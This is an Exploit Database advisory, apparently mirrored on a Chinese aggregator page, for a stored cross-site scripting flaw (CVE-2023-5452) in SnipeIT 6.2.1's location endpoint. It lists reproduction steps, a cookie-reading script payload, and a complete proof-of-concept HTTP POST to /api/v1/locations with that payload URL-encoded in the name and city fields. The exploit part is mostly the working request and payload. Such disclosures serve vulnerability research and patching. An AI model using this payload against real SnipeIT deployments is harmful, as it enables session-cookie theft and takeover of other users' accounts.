SnipeIT 6.2.1 – Stored Cross Site Scripting

• Exploit Database
• 13 阅读

• 作者： Shahzaib Ali Khan
  日期： 2024-03-12
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51883/

• Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting
  Date: 06-Oct-2023
  Exploit Author: Shahzaib Ali Khan
  Vendor Homepage: https://snipeitapp.com
  Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
  Version: 6.2.1
  Tested on: Windows 11 22H2 and Ubuntu 20.04
  CVE: CVE-2023-5452
  
  Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting
  (XSS) feature that allows attackers to execute JavaScript commands. The
  location endpoint was vulnerable.
  
  Steps to Reproduce:
  
  1. Login as a standard user [non-admin] > Asset page > List All
  2. Click to open any asset > Edit Asset
  3. Create new location and add the payload:
  <script>alert(document.cookie)</script>
  4. Now login to any other non-admin or admin > Asset page > List All
  5. Open the same asset of which you can change the location and the payload
  will get executed.
  
  POC Request:
  
  POST /api/v1/locations HTTP/1.1
  Host: localhost
  Content-Length: 118
  Accept: */*
  X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Origin: http://localhost
  Referer: http://localhost/hardware/196/edit
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;
  assetsListingTable.bs.table.cardView=false; laravel_token=
  eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3
  ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM
  d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0
  01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
  XSRF-TOKEN=
  eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH
  FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5
  MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D
  Connection: close
  
  name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=
  
  
  
  Thanks,
  Shahzaib Ali Khan